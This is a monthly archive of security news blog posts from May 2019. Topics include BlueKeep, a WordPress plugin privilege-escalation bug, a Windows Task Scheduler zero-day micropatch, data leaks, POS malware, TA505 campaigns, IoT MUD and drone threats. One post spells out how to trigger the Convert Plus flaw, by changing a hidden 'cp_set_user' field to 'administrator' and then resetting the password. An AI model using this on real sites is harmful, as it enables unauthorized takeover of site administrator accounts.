Monthly Archives: May 2019

Using Firepower to defend against encrypted RDP attacks like BlueKeep

This blog authored by Brandon Stultz

Microsoft recently released fixes for a critical pre-authentication remote code execution vulnerability in Remote Desktop Protocol Servierces (RDP). Identified as CVE-2019-0708 in May’s Patch Tuesday, the vulnerability caught the attention of researchers and the media due to the fact that it was “wormable,” meaning an attack exploiting this vulnerability could easily spread from one machine to another.

Cisco Talos started reverse-engineering work immediately to determine how exactly RDP was vulnerable. Talos wrote and released coverage as soon as we were able to determine the vulnerability condition. SID 50137 for SNORT® correctly blocks exploitation of CVE-2019-0708 and scanning attempts that leverage this vulnerability.


The post Using Firepower to defend against encrypted RDP attacks like BlueKeep appeared first on Cisco Blog.

WordPress Plugin’s Administrator Creation Bug Disclosed

WordPress and other CMS (Content Management System) are heaven-sent for non-programmers, as they can build and update the contents of their website without knowing any programming languages or scripting techniques. Developers of CMS are on-top of the situation when it comes to fixing bugs and security vulnerabilities of their products, however, the same CMS feature expansion capabilities that are beyond the full control of the core developers. These are the plugins, created by independent developers which easily extends the capability of the default CMS installation. It is a living case of convenience vs security, since the flexibility provided by an installed plugin increases the security risks and expands the attack surface of CMS.

Here in, we continue to inform people what particular Internet-facing software has a current critical issue, to provide you with well-informed option to decide what to do next. This time around, WordPress plugin named Convert Plus has a critical bug which can literally throw the baby with the bath water. Formerly known under the name Convert Plug, the Convert Plus plugin provides a WordPress website with lead-generation capability, which it claims to capture more users and traffic to the site for the long term.

The vulnerable version of Convert Plus provides external user the capability to receive an administrator-level account when trying to submit a form for new user creation for the website. The bug came from the “cp_set_user” value which is in a hidden field, that value can be modified by an outsider, changing the “cp_set_user” to “administrator” makes the account a super user for the website. Convert Plus version 3.4.2 and older have this privilege escalation flaw, and all WordPress administrators that deploys the plugin needs to upgrade to version 3.4.3 which patches the problem.

“This (buggy) code calls the plugin’s function cp_add_new_user_role with the role provided in the AJAX request, which then handles the process of creating the user as directed. Since no filtering is applied when this new subscription is processed, if an attacker submits a subscription form and changes the value of cp_set_user to “administrator”, the plugin will create an administrator user associated with the given email address. The new account is given a randomized password, but the attacker can issue a typical password reset to gain access to their rogue administrator account,” explained Mikey Veenstra, a security researcher for WordFence, as he describe what they call the Unauthenticated Administrator Creation bug.

Elvina Goves of the Convert Plus team acknowledge the responsible disclosure done by WordFence. The latter gave Convert Plus team enough time to issue a patch, perform security audit for its plugin and only released the details on how to trigger the bug after thefix is already made publicly available for download. “We are thankful to the team at Wordfence, who reported a vulnerability. We worked closely with them to understand the issue further and released a fix within 3 days. There is nothing to panic as we’ve not come across any known breakthroughs caused due to this vulnerability. We strongly believe that security is not an absolute and a one time fix that will work. It is a continuous process and should be managed regularly with regular checks and updates. We highly recommend our users to activate their license, so that they do not miss on such update notifications and can update Convert Plus with a single click,” emphasized Goves.

Related Resources:

Yet Another WordPress Hack Exploiting Plugin Vulnerabilities

The 10 Best WordPress Plugins for Small Business Website

How to Clean Malware-Infected WordPress Website

The post WordPress Plugin’s Administrator Creation Bug Disclosed appeared first on .

0patch released micropatch for BearLPE Zero-Day flaw in Windows 10 Task Scheduler

Researchers at 0patch released a temporary micropatch for the unpatched BearLPE local privilege escalation zero-day flaw in Windows 10.

Experts at 0patch released a micropatch to temporary fix a still-unpatched local privilege escalation on systems without rebooting them.

The zero-day vulnerability, dubbed BearLPE, was recently disclosed by the security researcher SandboxEscaper

The following video shows how the micropatch, composed of just five instructions, works on a vulnerable machine:

The exploit published by the expert triggers the flaw that resides in the Task Scheduler of Windows 10.

SandboxEscaper discovered that even starting with limited privileges it is possible to get SYSTEM rights by invoking a specific function. SandboxEscaper published a video PoC of the Windows zero-day that shows how to trigger it on Windows x86.

Will Dormann, vulnerability analyst at CERT/CC, confirmed that the Windows zero-day works on a fully patched (May 2019) Windows 10 x86 system.

According to Will Dormann, a vulnerability analyst at CERT/CC, the exploit is 100% reliable on x86 systems and needs to be recompiled for x64 machines.

“When you run Windows XP schtasks.exe on Windows 10, legacy RPC functions are called – which in turn call the current ones, such as SchRpcSetSecurity,” explained 0patch co-founder Mitja Kolsek.ù

The micropatch prevents changing the set of permissions a normal user has over a system file.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – micropatch, BearLPE)

The post 0patch released micropatch for BearLPE Zero-Day flaw in Windows 10 Task Scheduler appeared first on Security Affairs.

Chinese Dating Apps Leak US User Data

Chinese Dating Apps Leak US User Data

An unsecured Elastic database associated with dating apps has been discovered by a security researcher, making easily identifiable data exposed. Jeremiah Fowler, who has been working in the security software industry for over 10 years, found the database that held information about US data app customers, including their sexual preferences, lifestyle choices, and whether they were unfaithful to their partners. Fowler wrote on Security Discovery, "it is easy for anyone to identify a large number of users with relative accuracy based on their 'User ID.'"

According to Fowler, the IP address for the database was located on a US server and with the majority of users appearing to be Americans. He found that even though the data was hosted by "multiple dating applications," upon further investigation he found them to be developed by separate companies or individuals. 

He was able to identify the users' real identities online, as the dating applications logged and stored the user’s IP address, age, location, and user names. "Like most people, your online persona or user name is usually well crafted over time and serves as a unique cyber fingerprint," wrote Fowler. 

He attempted to contact the email addresses associated with the applications and identify the address and phone number using the Whois domain registration. "The address that was listed there was Line 1, Lanzhou and when trying to validate the address I discovered that Line 1 is a Metro station and is a subway line in Lanzhou," he explained on his blog. "The phone number is basically all 9’s and when I called there was a message that the phone was powered off.

"I am not saying or implying that these applications or the developers behind them have any nefarious intent or functions, but any developer that goes to such lengths to hide their identity or contact details raises my suspicions. Call me old fashioned, but I remain skeptical of apps that are registered from a metro station in China or anywhere else."

Terry Ray, senior vice president and Imperva Fellow, told Infosecurity that he agrees with Fowler's sentiments: "There are several strange things about this leaky database, especially the fact that the applications appear to target English speakers yet have, at least in one app, a business location in China, as having all owner or admin contact falsified or unavailable. It makes you wonder who is storing this data from these particular dating apps and what the underlying purpose is.

"Furthermore, why are multiple dating apps storing their data in the same place, yet little or no connection between the apps, their product names or their business contacts?"

At the time of writing his blog, Fowler disclosed that the database was still "publicly accessible" and despite a large number of users, there was no personally identifiable information. He had not received responses to his emails. "What concerns me most is that the virtually anonymous app developers could have full access to user’s phones, data, and other potentially sensitive information," he wrote. "It is up to users to educate themselves about sharing their data and understand who they are giving that data to. This is another wake-up call for anyone who shares their private information in exchange for some kind of service."

According to Verizon, 22% of data breaches in 2017 involved the use of stolen credentials, with 36% of compromised data being personal information such as name, birthday and gender.

"Although the article notes that this database wasn’t storing personally identifiable information, the writer was, in fact, able to ‘identify’ some of the ‘persons’ with the credentials found, this highlights the importance that if you are storing user data, you are responsible for ensuring that data is protected," Ray told Infosecurity. "Further, if you’re an app user and want to remain anonymous, make sure you use different usernames and passwords as much as possible."

Checkers and Rally’s Victims of Data Breach

Checkers and Rally's Victims of Data Breach

On Wednesday, Checkers Drive-In Restaurants alerted customers that it had been dealing with a data security issue involving "malware at certain locations."

On its website, the restaurant group announced that after discovering the issue, it "engaged leading data security experts to conduct an extensive investigation." Federal law enforcement authorities have also been informed in order to address the matter, with all parties working to contain and remove the malware.

"After becoming aware of a potential issue, we retained data security experts to understand its nature and scope," Checkers wrote on its website. "Based on the investigation, we determined that malware was installed on certain point-of-sale systems at some Checkers and Rally’s locations, which appears to have enabled an unauthorized party to obtain the payment card data of some guests." According to the website, not all locations were affected by this issue.

The malware was reportedly designed to "collect information stored on the magnetic stripe of payment cards." This included cardholder name, payment card number, card verification code and expiration date. Checkers has launched an investigation and is working with payment card companies to protect cardholders. 

The restaurant group has recommended that card users "remain vigilant" and review account statements. "If you believe there is an unauthorized charge on your card, please contact your financial institution or card issuer immediately," the website states. 

Other recommendations include ordering a credit report: "When you receive your credit report, review it carefully," the website continues. "Look for accounts you did not open, for names of creditors from whom you haven’t requested credit." 

The law firm of Federman & Sherwood has initiated an investigation into the data breach.

TA505 Suspected in Chilean Financial Institutions Malware Attacks

TA505 Suspected in Chilean Financial Institutions Malware Attacks

Investigators from CyberInt Research have identified further activities by the suspected Russian-speaking cyber-gang TA505, targeting financial institutions in Chile. The cyber-gang is continuing its "unauthorized and nefarious use of the same TTPs of legit software, this time leveraging MSI Installer to deploy the AMADAY malware family," according to the company.

The AMADAY implant allows cyber-criminals to steal financial institutions’ and retailers’ clients’ email correspondence and sensitive information. This further enables them to steal contact lists, allowing them to target additional organizations by sending seemingly legitimate malicious emails that appear to come from trusted sources.

TA505 has been active since 2014, with high-volume malicious email campaigns distributing the Dridex and Shifu banking Trojans, as well as the Neutrino botnet/exploit kit and Locky ransomware. They appeared again as the source for recent attacks against the global financial and retail industry from December 2018 to present, with attacks worldwide, including India, Italy, Malawi, Pakistan, South Korea and the United States.

“TA505 is highly motivated, very clever, and persistent,” says Adi Peretz, head of research at CyberInt. “It’s critical to monitor their activities to anticipate further attacks. Once the pattern of attacks in Chile was identified, other financial institutions can beef up their security, so they don’t end up being breached."

“Social engineering works because it recruits the weakest link in any cybersecurity operation – we humans,” continues Peretz. “The more prepared companies are, the better they can train their people to maintain security.”

In April 2019, Infosecurity Magazine reported that TA505 was using a TektonIT remote administration tool to target financial and retail institutions. CyberInt found that the tool was "virtually undetectable" by threat protection systems due to it being "legitimate software." 

"Tried and tested attack patterns appear to be consistent across these recently observed campaigns and commence with the delivery of phishing emails that have lure document attachments," according to a CyberInt report. "Utilising legitimate logos, language and terminology consistent with common business interactions or the target organization, the email encourages the potential victim to open the lure document attachment which in turn instructs them to disable security controls within Microsoft Office to allow a nefarious macro to be executed."

Threat Roundup for May 24 to May 31

Today, Talos is publishing a glimpse into the most prevalent threats we’ve observed between May 17 and May 24. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, this post will summarize the threats we’ve observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center,, or


TRU05312019 – This is a JSON file that includes the IOCs referenced in this post, as well as all hashes associated with the cluster. The list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and that one single IOC does not indicate maliciousness. See the Read More link above for more details.

The post Threat Roundup for May 24 to May 31 appeared first on Cisco Blog.

Rally’s and Checkers’ POS Infection Since 2015 Exposed

Did you patronize one of the Rally’s food joints and Checkers Drive-In restaurants since December 2015? Then this news is for you: The two drive-through food chains with 100+ branches in the United States had 15% of their cash registers infected by POS malware since late 2015. Customer information was harvested by the malware, with the latest data showed that retail transactions till April 30, 2019, were affected. Rally’s and Checkers operate stores in the states of Virginia, Tennessee, Pennsylvania, Ohio, North Carolina, New York, New Jersey, Nevada, Michigan, Louisiana, Kentucky, Indiana, Illinois, Georgia, Florida, Delaware, California, Arizona and Alabama.

One of the worst hit with malware was Rally’s food joint in Los Angeles, where the infection period of the Point-of-Sales Terminal started December 17, 2015 with the store technicians only able to clean the machine on March 28, 2018. “After becoming aware of a potential issue, we retained data security experts to understand its nature and scope. Based on the investigation, we determined that malware was installed on certain point-of-sale systems at some Checkers and Rally’s locations, which appears to have enabled an unauthorized party to obtain the payment card data of some guests,” explained Kim Francis, Media coordinator for Magpie, LLC, the umbrella entity that owns both Checkers and Rally’s.

In the name of transparency Magpie posted in its website a list of all its branches with customer exposed data and the period of infection. We in highly recommend customers of the two food chains to check-out the list, in order to narrow down the possibility of their personal information being part of the leak. Kim Francis also disclosed that the customer data that the POS held came from the magnetic-stripe debit/credit card that their clients used to pay for the food purchases. In the United States, the use of magnetic-stripe cards for payment are still prevalent compared to the more secure EMV (Europay Mastercard Visa) chip-based cards. The likely information exposed are the card holder’s full name, card number, verification code and expiration dates of the card.

“After identifying the incident, we promptly launched an extensive investigation and took steps to contain the issue. We also are working with federal law enforcement authorities and coordinating with the payment card companies in their efforts to protect cardholders. We continue to take steps to enhance the security of Checkers and Rally’s systems and prevent this type of issue from happening again,” added Francis.

Magpie recommends affected customers to apply for a free credit report monitoring from, alternatively their clients can also call 1-877-322-8228. Additionally, being extra vigilant when reading account statements, as discrepancies and fraudulent transactions with the credit charges can be reversed by the card issuing bank. At the same time, Magpie has opened a special hotline for their customers that have specific queries regarding the incident, 1-844-386-9554. The company also opens their main office for walk-in queries: Monday through Friday from 8:00 a.m. to 10:00 p.m. CST and Saturday and Sunday from 10:00 a.m. to 7:00 p.m. CST.

Also, Read:

Huddle House Restaurant Chain’s POS System Breached

Magstripe Credit/Debit Cards & Magstripe-only POS: A Security Nightmare

Recipe for disaster: Bluetooth-enabled POS Terminals + MagStripe-based Cards

The post Rally’s and Checkers’ POS Infection Since 2015 Exposed appeared first on .

The Importance of the MSP Sales Process

Reading Time: ~ 3 min.

I’ve been in this business a long time, and I can honestly say that many MSPs lack a concrete sales process structure. That’s pretty worrisome because, let’s face it, you have to have a plan in order to succeed at just about anything. Imagine you’re an engineer working on server maintenance or a network infrastructure build—you wouldn’t do that without a plan, would you? Your sales strategy should be handled no differently. 

Dos and Don’ts for your Sales Process

First, let’s talk about some don’ts. Avoid taking a call and immediately giving a quote over the phone, as well as going straight to the customer site to conduct ad hoc assessments and sales presentations in the same breath. To build value, you need to stretch this into multiple touches, by which I mean multiple meetings. Sure, that’s more work for you up front, but it’s crucial for establishing trust with the client. You need to open and sustain a dialog about their needs so you can tailor a unique solution for them, without diving right into a pitch. By leading with careful consideration and attention to their needs, you can begin building a lasting relationship and, eventually, bring them a better offering.

Here’s how I recommend you structure your process.

Schedule an on-site strategy session with your client.

Meeting with a prospect face-to-face will demonstrate your investment in a trust relationship. Now, you have to listen to them. Don’t lead with a pitch. Let them tell you what their problems are, pay close attention to them as they express their needs, and take note of all their pain points.

This is also the ideal opportunity to truly grasp of whether the demands are excessive or unreasonable for your capabilities. Each relationship you enter into with clients is a partnership that comes with shared responsibilities. Be more than a fulfull/deliver shop. 

Perform an in-depth assessment and discovery.

You need to discover everything that’s on the client’s network and assess exactly where they stand. Don’t do this on the same day as that initial meet; schedule a second one. Take the extra time between the meetings to prepare more specific questions that will delve more deeply into the needs your prospect expressed. This will help show the client that you’re invested in their unique challenges.

When you come back, bring an engineer or assistant with you. You need someone with you who can interview different staff members and find out about the specific issues they face. Ask basic questions to understand how the employees feel about where the company’s IT stands, like: What kind of issues are you having?; What do you see wrong with your computer network?; How could your network be improved?; and What things would you like to see change? 

As you’re doing your assessment and discovery, make sure to bring cybersecurity into the discussion. Managed cybersecurity is often a poor experience, so this is your chance to feel out how else you can alleviate their pains (and set yourself apart from their current provider.) 

And, finally, book the third meeting. 

Make the pitch.

Ideally, your third meeting would be at your location. If there’s some reason you can’t do it in your own shop, take the prospect off-site for lunch at a restaurant that has private meeting rooms. Essentially, you want to avoid doing the presentation in their office, where they can easily get interrupted.

In this case, it will pay to be overly prepared. Again, if you listened closely, the prospect would’ve already told you what to focus on to help them succeed. Use that knowledge to craft the right message to deliver during this meeting. 

Start by walking through the pain points they and their employees revealed. Talk over anything else you found in your discovery/assessment that could be improved. Have an itemized list, and then ask them if they agree with all the issues you’ve found.

Once you get agreement, then you can go into your sales pitch and present them with a well-tailored offering that can actually solve their challenges and help them grow. 

Ultimately, by listening to your prospect, exhibiting an understanding of their needs, and demonstrating your level of commitment to providing value and nurturing the relationship itself, you’ll be well on your way to building a meaningful, successful business partnership.

The post The Importance of the MSP Sales Process appeared first on Webroot Blog.

Cyber News Rundown: Popular News Site Breached

Reading Time: ~ 2 min.

News Site Suffers Data Breach

Flipboard, a news aggregation site, recently revealed that it’s been the victim of a data breach that could affect many of their more than 100 million active users. Digital tokens were among the compromised data, which could give the attackers further access to other sites, though Flipboard promptly removed or replaced them. At least two separate breaches have been reported by Flipboard, with one occurring in the middle of 2018 and the other in April of this year. Both allowed the attackers nearly unlimited access to databases containing a wealth of user data.

Keylogger Targets Multiple Industries

At least two separate campaigns have been found to be sending malicious emails to industry-leading companies in several different areas of business. Hidden within these emails are two variants of the HawkEye keylogger that perform various malicious activities beyond simply stealing keystrokes from the infected device. By acting as a loader, HawkEye can install additional malware and even contains a script to relaunch itself in case of a system reboot.

Australian Teen Hacks Apple

A teen from Australia was recently in court to plead guilty to two separate hacks on Apple, which he conducted in hopes of gaining a job with the company. While Apple has since confirmed that no internal or customer data was breached, they have chosen leniency after his lawyer made a case for the perpetrator being remorseful and not understanding the full impact of his crimes.

Fake Crypto-wallets Appear on App Store

Several fake cryptocurrency wallets have made their way into the Google Play store following the latest rise in the value of Bitcoin. Both wallets use some form of address scam, by which the user transfers currency into a seemingly new wallet address that was actually designed to siphon off any transferred currency. The second of the two wallets operated under the guise of being the “mobile” version of a well-known crypto-wallet. It was quickly identified as fake due to an inconsistent icon image. Both fake wallets were tied to the same domain and have since been removed from the store.

Ransomware Focuses on MySQL Servers

While the threat of GandCrab is not new, organizations discovered its persistent risk after researchers found it has been refocused on attacking MySQL servers. By specifically targeting the port used to connect to MySQL servers, port 3306, the attackers have had some success, since many admins allow port 3306 to bypass their internal firewalls to ensure connectivity. As GandCrab continues to narrow it’s attack scope, its remaining viable vectors are likely to be even more lucrative given that most organizations are not able to secure everything.

The post Cyber News Rundown: Popular News Site Breached appeared first on Webroot Blog.

TrustArc Participates in IAPP Canada Privacy Symposium 2019

TrustArc was pleased to once again take part in the IAPP Canada Privacy Symposium held on May 23rd and 24th in picturesque Toronto–participating in four conference sessions, side events and, of course, countless conversations. The annual confab of industry thought-leaders, regulators and privacy professionals from Canada and abroad came at a particularly fascinating moment for privacy and data protection in the world’s second largest country. Recent events that have cast Canada in the privacy spotlight include the Office of the Privacy Commissioner (OPC)’s release of findings against the Canadian arm of a global credit reporting agency headquartered in the U.S.; … Continue reading TrustArc Participates in IAPP Canada Privacy Symposium 2019

The post TrustArc Participates in IAPP Canada Privacy Symposium 2019 appeared first on TrustArc Blog.

MUD is officially approved by IETF as an Internet Standard, and Cisco is launching MUD1.0 to protect your IoT devices

With over 8 billion “things” being connected today, IoT security has undoubtedly evolved from a mysterious buzzword to one of the biggest real threats to our network today. According to Gartner, over 51% of survey respondents believe that cybersecurity is the number one technology-related challenge for IoT deployment.

Overwhelmed by the countless number of IoT security comments and stories, let’s try to demystify this seemingly complex concept. To begin, let me ask you three simple questions: What types of IoT devices are connected to your network? What behaviors are appropriate for these IoT devices? Is there an industry standard to follow while connecting these IoT devices? If you don’t know the answers to these questions yet, that’s when we say the IoT security risks are probably right around the corner staring at you.

What is MUD?

To answer the above three questions, Cisco has been working on a solution known as Manufacturer Usage Description (MUD) to arm IoT security with you.

The key idea of MUD is to facilitate device visibility and segmentation by allowing your network administrators to effortlessly identify the type of IoT device and define the corresponding appropriate behaviors for that device. To do this accurately, we are introducing a participant to the conversation: the manufacturer. IoT manufacturers are able to disclose to us what their devices are, and what network policies they need for the devices to correctly function.  This whitelist statement is something that customers can use to deploy access policies in their own networks without any guesswork.

As shown in Figure 1, an IoT device first sends out a pre-embedded MUD-URL to the network devices (e.g. switch & AAA server), through which the MUD-URL will be received by the MUD controller (software). According to the specific MUD-URL, a matching MUD file will be provided from the MUD file server and translated into policy format through the MUD controller, to then enforce the access control list to the device.

Clear benefits to both customers and device manufacturers brought by MUD

If you get the overall idea of MUD so far, you may see that IoT device manufacturers and customers are two key stakeholders in the MUD ecosystem. MUD offers distinct benefits for customers and manufactures:

Benefits to customers:

  • Automate IoT device type identification thus reducing operational costs
  • Simplify and scale IoT device access management by automating policy enforcement process
  • Reduce threat surface of exploding number of IoT devices by regulating traffic and thus avoiding lateral infections
  • Secure enterprise network through standard-based approach

Benefits to manufacturers:

  • Improve customer satisfaction and adoption due to reduced operational costs and security risks
  • Enhance device security through standard-based onboarding procedure
  • Differentiate device offerings with embedded network-based device security feature
  • Reduce product support costs to customers by following an easy-to-implement process

In addition to these benefits, we’ve received positive feedback from our partners:

“MUD technology is valuable for Innovative Lighting. MUD technology will enhance our commissioning process by identifying our devices on the network. Furthermore, MUD technology will provide the appropriate access control policy promoting a more secure system. We look forward to working more with Cisco and the MUD technology.”

-Harry Aller, CTO at Innovative Lighting

 “MUD was selected to protect Molex IoT solution against malicious parties. MUD is a relatively simple solution to implement at the device level, light on constrained IoT devices but takes advantage of strong network infrastructure including network switches and authorization server. Our goal to reduce exposure footprint and the overall solution allows us to provide a level of security to our customers that is scalable and flexible at the same time. The ability to whitelist specific devices in the field allows us to lock down the network but also to respond quickly to events that may take place post deployment.”

-Mo Alhroub, Manager of Software Engineering at Molex

MUD is approved as an Internet Standard and released as RFC8520 by IETF

I am delighted to announce that MUD has been officially approved as an Internet Standard by the Internet Engineering Task Force (IETF) and is now released as RFC 8520. You can find all of the details here: Meanwhile, MUD is also part of the NIST Mitigating IoT-Based DDoS project, and an optional component of the Open Connectivity Foundation’s framework now.

MUD 1.0 is ready

Besides the IETF approval, I am also thrilled to announce that we are launching MUD1.0, the first phase of the entire MUD solution. While MUD itself is an open standard, Cisco is pioneering our unique version by leveraging Cisco switch and ISE (Identity Service Engine, a AAA server) as the network devices shown in Figure 1.

In this Cisco MUD1.0 release, we focus on providing device visibility by enabling the IoT device identification inside the enterprise network. As shown in Figure 2, the IoT device sends out the MUD-URL to the switch and then passes it to ISE. The administrators will see the device specific information on ISE UI including the device model, manufacturer, etc. Specifically, MUD1.0 supports profiling IoT devices, creating profiling policies dynamically, and automating the entire process of creating policies and Endpoint Identity Groups. Furthermore, administrators can leverage these profiling policies to create Authorization Policies and Profiles manually for securely on-boarding IoT devices.

To make the sophisticated story simple, through MUD1.0, you would know exactly what devices are coming to your network the minute they are connected. Even more, you can define policies for these IoT devices. Isn’t that amazing?!

With MUD1.0 released, future releases will more fully automate the policy control part. On top of MUD1.0 when ISE receives the MUD-URL to extract the visibility information, the MUD-URL will be passed to the MUD controller (software) which will then go out to the MUD server to get the MUD file and translate the content into policy (as shown in Figure 1). The network devices will then enforce the appropriate policy onto the devices. The whole process will be fully automated. Want more flexibility as well? No worries, we’ve got you covered! Before the automation process, you get the choice to edit the recommended policy as needed.

Next steps

Join us at Cisco Live San Diego US 2019, to check out the MUD capabilities in person! We will have a demo partnering with Molex (Networking + Security Innovation Forum, demo pod #8, 6/10/2019-6/13/2019), and a Technical Breakout session (ID:BRKIOT-1553, 6/12/2019 4PM) at San Diego Convention Center.

Moving forward, we are upgrading and further building a MUD Devnet website. There will be clear step-by-step guidance for both end customers and device manufactures to help you understand how the solution works and get the support needed. Stay tuned!

Reach out to Cisco sales representatives if you are interested in deploying MUD1.0 on your network. Or shoot an email to, if you have any other questions or are interested in being our partners. We have all of the experts here to support you!



The post MUD is officially approved by IETF as an Internet Standard, and Cisco is launching MUD1.0 to protect your IoT devices appeared first on Cisco Blog.

Cybersecurity and Drones – A Rising Threat?

Drones, which are part of the UAV (unnamed aerial vehicles) group, have certainly seen an increase in popularity in the past few years. The global drone market is expected to grow from $14 billion in 2018 to over $43 billion in 2024. Long gone are the days when drones were only used for military purposes – today they can basically be purchased and flown by anyone. They can be affordable, come in all sizes, and can get as sophisticated as you can imagine.  

Drones are now used for a multitude of purposes, ranging from recreational use, photography and filmmaking, agriculture, to surveillance and so many other uses. This technology will soon even be utilized by Amazon to deliver small packages, has already been employed by Domino’s to bring pizza, and UPS has used it to ship medical samples in the US. 

But technology like this can equally be used for good and bad purposes and could easily turn into a sci-fi nightmare. And one of the biggest concerns here is that drones can be hacked, or other drones can be used to hack electronic devices and gather data without one’s consent. 

The malicious uses of drones 

Drones can become a threat to your privacy since they can be used as spying devices. 

Numerous cases have been reported so far. To name a few, a couple flew a drone to watch their neighbors and ended up being arrested, and burglars are now reportedly using drones to scout houses they intend to rob.  

Privacy-related incidents may be so common since many countries don’t have any drone laws in place, or drone users are simply unaware of them. But there are some countries that did release regulations. For example, the UK is currently in the process of updating their Drones Billmost probably as a response to the famous Gatwick Airport incident, when drone sightings stopped 1,000 flights from December 19-21, 2018 and affected the travel plans of around 140,000 people. The United States has also released regulations for drone users, and you can go through them here if you are flying your drones in the US. 

Some drones can even see through walls by employing Wi-Fi and 3D imaging, and could easily create 3D plans of building that could facilitate criminals’ access inside them. 

Not only that, other prominent issues are related to cyber-attacks, which may have seemed impossible to happen in the past but could now be carried out using drone technology. Drones can now be used to hack servers, spy on networks, extract data, and block communications.  

Corporate networks can be heavily affected by the malicious use of drones, so companies need to have solid security measures in place to prevent unwanted access and protect themselves from cyber warfare attacks. 

How hackers steal data with drones

Attackers can attach a small computer (such as Raspberry Pi) to a drone, fly it over places where they wouldn’t normally be able or allowed to enter, and then exploit Wi-Fi, Bluetooth, or RFID (Radio-frequency identification) vulnerabilities. 

A cybersecurity company proved that a drone could basically be connected to any devices, like smartphones or laptops, during the 2014 Black Hat security conference in Singapore. They used a drone to intercept data from the attendees’ phones with a software dubbed Snoopy that ran on the minicomputer attached to the drone. It could mimic Wi-Fi networks that victims were connected to in the past and then they were able to steal any information that was used on the device, including bank details and passwords 

Also, other sources have shown that drones equipped with a radio transceiver could be used to hijack Bluetooth mice. This means that any other Bluetooth-connected devices could be accessed, such as keyboards, from which attackers could obtain keystrokes and figure out users’ login credentials. 

Your own drone could be hacked easily 

Imagine you are flying your drone, planning to take breathtaking shots of the spectacular location you are exploring and all of a sudden, the drone crashes and hits the ground. Or worse, it starts flying into random people and injures them.  

One way this could happen is through GPS spoofing. This practice involves tricking a GPS receiver by transmitting a fake GPS signal. As a result, the drone will use the wrong location.  

How malicious drones can be stopped  

The market size of the anti-drone market is expected to reach $1.85 billion by 2024, which proves the fact that significant efforts are being made to fight hostile drones.  

For instance, researchers funded by the EU are trying to find ways to detect and disable malicious drones through the KNOX project. Additionally, a recent study conducted by Fujitsu System Integration Laboratories and the Ben-Gurion University of the Negev addresses the same issue and analyzes methods to detect drones. What’s more, companies AT&T and Dedrone (a drone detection technology start-up) are collaborating to develop IoT solutions against malicious drones.  

Below I’ve included a few methods used to detect rogue drones: 


1. Geofencing  

Geofences are virtual boundaries set up within physical locations where drones can be detected when they reach certain delimited areas.  

How does geofencing work 

This is a location-based service and can be set up using GPS, Wi-Fi, Bluetooth, cellular data or RFID. In order to use geofencing, a developer or admin must create a virtual border around a specified location in GPS or RFID-enabled software. It’s quite a simple operation and can be represented, for example, by a circle drawn around a location on Google Maps. Technically, the geofence should generate a response to the moment an unauthorized drone enters the defined area.  

However, this technology may not always be so efficient 

Regular drones have built-in geofencing software, so you can’t unknowingly fly them over restricted areas, but malicious actors could build their own devices without this software or even hack the standard ones. Apparently, there is a website (on the open internet, not on the dark webthat sells hacks for drones manufactured by DJI, the market leader in unmanned aerial vehicles. The hackers’ solutions remove geofencing, altitude, and speed limitations. 

2. Radar 

Radar is already the standard go-to mechanism for aerial vehicles detection, so drones can also be detected using radar detection systems. 

Drone radars use a combination of noise detection, thermal detection, radio signal detection, and signal identification. However, this method is not fully accurate, as it can easily mistake birds for drones. 

Additionally, some drone radars also use microphones to recognize noise patterns, but this has proved to be ineffective in noisy urban areas. 

3. Acoustic sensors 

These sensors are able to detect drones that sometimes can’t be seen by radars.  

Acoustic sensors recognize the unique sounds generated by different drone types and run them against a sound signatures database. If there’s a match, the system triggers an alert.  


4. RF Scanners 

Radio-frequency scanners examine the electromagnetic spectrum and find the specific transmissions from drones.  

However, RF scanners will work when radio signals are present. Some drones operate without any RF signals and only rely on GPS, so this method will, in some cases, be inefficient.  


5. Thermal imaging 

Thermal drones use vision imaging cameras that work by detecting heat emitted by almost all objects and materials.  

So, drone thermal cameras could prove to be powerful tools to detect unwanted UAVs.  

Of course, there are many other methods out there (including hybrids) that are meant to stop malicious drones, which I haven’t mentioned in this article. Here are some more resources I recommend you check out if you want to become an anti-drone expert: 

To Sum Up 

Drones are certainly impacting our daily lives and will, without doubt, make up an important part of the IoT network used in our future smart cities. But sadly, they can be easily misused for malicious purposes. So, a lot of effort should be put into their cybersecurity and using the proper ways to detect and take down the ones which are threatening us.  

What is your opinion on the issues related to drones and cybersecurity? Share your thoughts in the comments section below. 

The post Cybersecurity and Drones – A Rising Threat? appeared first on Heimdal Security Blog.

Microsoft warns for the second time of applying BlueKeep patch

Microsoft issued a new warning for users to update their systems to address the remote code execution vulnerability dubbed BlueKeep.

Microsoft issued a new warning for users of older Windows OS versions to update their systems in order to patch the remote code execution vulnerability dubbed BlueKeep.

The vulnerability, tracked as CVE-2019-0708, impacts the Windows Remote Desktop Services (RDS) and was addressed by Microsoft with May 2019 Patch Tuesday updates. BlueKeep is a wormable flaw that can be exploited by malware authors to create malicious code with WannaCry capabilities.

As explained by Microsoft, this vulnerability could be exploited by malware with wormable capabilities, it could be exploited without user interaction, making it possible for malware to spread in an uncontrolled way into the target networks.

Many security experts have already developed their own exploit code for this issue without publicly disclosing it for obvious reasons.

Microsoft has released patches for Windows 7, Server 2008, XP and Server 2003. Windows 7 and Server 2008 users can prevent unauthenticated attacks by enabling Network Level Authentication (NLA), and the threat can also be mitigated by blocking TCP port 3389.

Now Microsoft is warning again companies to patch older versions of Windows to avoid the exploitation of the flaw. Security experts fear a new massive attack that could affect millions of computers worldwide running still unpatched systems.

The availability of explot codes in the wild poses a severe risk for tne users. Experts at the SANS Institute observed two partial exploits that are publicly available. Chaouki Bekrar, the founder of zero-day broker firm Zerodium, explained that the flaw can be exploited remotely by an unauthenticated user to gain access to a device with SYSTEM privileges. Researchers at McAfee developed a PoC exploit that could be exploited to get remote code execution.

Other experts also announced to have successfully developed exploits for BlueKeep, including KasperskyCheck Point, and MalwareTech.

Recently, the popular expert Robert Graham has scanned the Internet for vulnerable systems. He discovered more than 923,000 potentially vulnerable devices using the masscan port scanner and a modified version of rdpscan,  

